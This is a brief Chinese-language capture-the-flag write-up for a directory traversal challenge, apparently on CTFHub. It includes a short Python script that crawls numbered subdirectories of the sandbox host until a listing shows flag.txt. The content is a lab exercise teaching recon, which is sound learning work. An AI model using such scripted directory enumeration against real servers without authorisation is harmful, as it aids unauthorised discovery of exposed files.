题目描述

目录遍历

Solution

打开题目,点击按钮能看到服务器的文件:

1.png

我们可以一个个点进去找,也可以用脚本来帮我们完成整个工作:

  1. import requests
  3. url = "http://challenge-9126d4cf5c5d6521.sandbox.ctfhub.com:10800/flag_in_here/"
  5. for i in range(5):
  6.     for j in range(5):
  7.         url_current = url +  str(i) + "/" + str(j)
  8.         resp = requests.get(url_current)
  9.         resp.encoding = "utf-8"
  10.         web_content = resp.text
  12.         if "flag.txt" in web_content:
  13.             print(url_current)

运行结果:

2.png

我们直接去第3/3页,确实找到了 Flag 文件,打开查看内容:

3.png